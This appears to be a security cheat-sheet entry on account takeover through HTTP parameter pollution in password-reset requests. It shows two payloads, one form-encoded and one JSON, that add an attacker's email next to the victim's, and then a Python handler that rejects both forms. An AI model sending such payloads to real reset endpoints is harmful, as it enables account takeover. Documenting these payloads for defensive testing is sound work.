Parameter pollution (password resets)
Account takeover via parameter pollution
Example of parameter pollution to send the victim's password reset link to the attacker's email:
email=victim-user%40syslifters.com&email=attacker-user%40syslifters.com
Or in JSON:
{"email":["victim-user@syslifters.com","attacker-user@syslifters.com"]}
Reference: GitLab account takeover
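A server-side check against both payload forms above, as an added example (not code from the original page or from GitLab): the handler accepts exactly one string value for email and sends the link only to the address stored on the account. The function names and the in-memory account store are hypothetical and constructed for illustration; the duplicate-JSON-key check goes one step beyond the two payloads shown.

```python
import json
from urllib.parse import parse_qs

# Constructed sample data: email -> account id, account id -> stored address.
ACCOUNTS = {"victim-user@syslifters.com": 1001}
STORED_EMAIL = {1001: "victim-user@syslifters.com"}


class RejectedRequest(ValueError):
    """The email field is missing, repeated or not a plain string."""


def _unique_keys(pairs):
    # Hook for json.loads: refuse objects that repeat a key.
    keys = [k for k, _ in pairs]
    if len(keys) != len(set(keys)):
        raise RejectedRequest("duplicate JSON key")
    return dict(pairs)


def extract_single_email(body, content_type):
    """Return the one email value in the request or raise RejectedRequest."""
    if content_type == "application/json":
        try:
            data = json.loads(body, object_pairs_hook=_unique_keys)
        except json.JSONDecodeError as exc:
            raise RejectedRequest("malformed JSON") from exc
        value = data.get("email") if isinstance(data, dict) else None
        # An array (or any non-string) is the JSON form of the pollution.
        if not isinstance(value, str):
            raise RejectedRequest("email must be a single string")
        return value.strip().lower()
    # parse_qs keeps every occurrence, so a repeated parameter is visible.
    values = parse_qs(body, keep_blank_values=True).get("email", [])
    if len(values) != 1:
        raise RejectedRequest("email must appear exactly once")
    return values[0].strip().lower()


def reset_recipient(body, content_type):
    """Return the address the reset link is sent to, or None if unknown."""
    requested = extract_single_email(body, content_type)
    account_id = ACCOUNTS.get(requested)
    if account_id is None:
        return None  # caller should respond the same as for a known account
    # Deliver to the address stored on the account, never to request input.
    return STORED_EMAIL[account_id]
```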